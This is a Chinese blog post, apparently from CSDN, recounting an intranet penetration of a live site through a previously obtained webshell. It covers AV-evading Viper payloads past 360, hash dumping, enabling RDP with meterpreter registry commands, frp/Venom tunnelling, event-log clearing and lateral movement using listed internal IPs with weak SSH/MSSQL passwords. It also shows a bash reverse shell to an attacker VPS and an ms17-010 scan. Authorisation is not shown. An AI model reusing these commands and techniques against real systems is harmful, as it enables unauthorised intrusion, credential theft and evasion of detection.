实战| 记一次借Viper来多重内网渗透

本文记录了一次使用Viper进行内网渗透的过程,包括如何绕过360防护上线,抓取系统哈希,通过端口转发实现内网访问,以及利用Venom进行内网横向移动。作者还分享了内网资产扫描和端口转发工具的使用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

​ 实战| 记一次借Viper来多重内网渗透

马上hw,这两天闲的荒,来点实操, --2022/6/21 19:05 ECHO::

上次打攻防漏了很多web端、很多ssh这块和端口转发的内容,,算是个很大的缺口,从我那上百个shell中随机挑个站点,开始一场内网渗透。具体怎么拿的shell,在这里,

https://blog.youkuaiyun.com/qq_29437513/article/details/122283851

0x01.Viper上线

​ viper更新到1.5.22了,通过Callback回调函数生成免杀exe,下载本地,上传目标机

1

冰蝎执行

2

目标环境有360,但viper还是上线了

3

老话题: 怎么绕过的360?怎么上线的?

  1. 某60,执行命令拦的很,各种白名单拦截,同时还弹窗,最常见的net user,

执行返回拒绝,这种情况360全部功能全开

4

2.第二种情况,360不全开,比如,用户长时间未登录,锁定,不会全拦5-1

0x02.抓取Hash

上线后,抓取hash,viper自带有hashdump,但需要进程x64,默认上线的进程x86,进行进程迁移,,选择高权限的conhost.exe 2345explor 这些进程,(尽量不选择靠前的系统进程,注入容易重启)

5-2

抓到hash,拿去解密,Aa123456,这个内网常用弱口令,mssql和rdp,ssh常用(root admin123)

5-3

msf模块,注册表开启3389 post/windows/manage/enable_rdp

reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
execute -H -f cmd.exe -a "/c sc stop termservice"
execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"

注册表的端口值

键1

netstat发现已经监听,但端口扫描未发现开启,得出结论,这是内网机器,通过映射到出口ip上,

6-4

0x03.端口转发

内网的机子,虽然有webshell,但他是映射到出口ip上,不能正向代理。

可以反向代理,机子能访问外网vps的端口,吧流量转到vps端口上,在vps开个端口转发,本地pc机进行内网访问。

我这里用过的有frp 和Venom

01.frp的代理,常用的是vps监听端口,内网吧3389流量转发给vps

02.Venom的代理,和frp差不多,通常可以配合proxifer流量代理,本地Pc机访问到内网应用。

本地测试 frp

​ 服务端只需要配置bind_port ,这里vps配置22222,

7

​ webshell端的frpc.ini配置,转发流量到vps的22222,允许外网通过vps的6000端口访问3389服务

7-1

转发成功,

8

吧解密的管理员密码登录

8-1

查看事件管理器,清除事件,很明显看到之前有人反复fuzz登录密码,同时登录没有rdp登录成功通过别的方式比如webshell部分也会记录,进程services.exe tomcat.exewebshell登录

发现有teamviewer

9

0x04.内网横向

内网横向有域打域控,没域打内网其他的设备,看能拿多少台服务器,这次测试的目的是内网的服务器,内网的网络设备,摄像头、安全设备、数据库不考虑在内

判断域,不存在域

	net time /domain	  域控的时间同步

	net config workstation 查看主机在内网的角色

横向我用的是端口转发是Venom,这tm就是神器,稳的一批。

内网资产扫描我用的是

https://github.com/1n7erface/RequestTemplate

扫描b端很全,,常见的ssh、redis和web扫描,xray的内核,挂到rdp里面

一些ssh

ssh 10.10.11.113 22 root admin123
ssh 10.10.11.110 22 root admin123
ssh 10.10.11.114 22 root admin123
10.10.30.83 1433 sa Aa123456

Venom内网渗透

1.webshell执行命令 agent.exe rhost rport

11-1

2.vps端监听1009,goto 1进行操作,socks代理出来本地PC通过proxifer代理连接

11-2

本地PC通过Proxifer设置socks代理

12

设置代理规则

代理2

本地PC-xshell连接内网ssh,

14

登录成功,查看history,有很明显的开发痕迹,这里不进行后续渗透

a

nc反弹shell到vps,点到为止,

nc -lvp 6000
bash -i >& /dev/tcp/vpsip/6000 0>&1

反弹成功,拿到shell

15

到此为止,,走之前清理痕迹,msf批量扫描ms17-010捡个漏

msf添加路由,

msf

有捡漏,但不进行后续渗透

同网段

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ECHO::

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值